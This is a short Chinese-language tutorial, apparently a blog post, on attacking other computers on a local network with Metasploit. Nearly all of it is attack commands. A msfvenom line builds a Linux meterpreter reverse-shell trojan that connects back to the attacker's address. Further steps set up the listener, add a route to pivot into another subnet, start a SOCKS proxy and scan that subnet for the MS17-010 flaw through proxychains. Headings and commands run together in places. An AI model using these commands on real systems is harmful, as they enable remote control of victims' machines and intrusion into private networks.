攻击其他局域网内的电脑
文章目录- 前言
- 一、生成木马
- 1.生成木马
- 2.设置监听
- 3.设置reverse payload
- 二、等待目标机上钩之后
- 三、配置 socks 代理
- --------------容易遇到的问题--------------
前言
提示:
123
一、生成木马 1.生成木马
msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.0.55 LPORT=4444 -b "x00" -f elf -o feixiang2.设置监听
use exploit/multi/handler3.设置reverse payload
二、等待目标机上钩之后exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.0.55
msf6 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) run
1.把meterpreter 保存到后台
background
查看路由信息
route
2.添加一条路由转发
route add 192.168.110.111 255.255.255.0 1
三、配置 socks 代理1:是sessions
配置完路由实际上就可以访问目标了。
use auxiliary/server/socks_proxy #启动代理 run vim /etc/proxychains4.conf #更改代理文件 socks5 192.168.0.55 1080 #添加一行
1080 跟socks_proxy 的 srvport 对应
2.通过代理扫描内网。
└─# proxychains nmap -Pn -sT -p 445 --script=smb-vuln-ms17-010.nse 192.168.110.0/24
3.通过代理启动 msf
└─ proxychains msfdb run--------------容易遇到的问题--------------
添加 firewall-cmd --zone=public --add-port=80/tcp --permanent (–permanent永久生效,没有此参数重启后失效)
重新载入 firewall-cmd --reload
查看 firewall-cmd --zone=public --query-port=80/tcp
删除 firewall-cmd --zone=public --remove-port=80/tcp --permanent



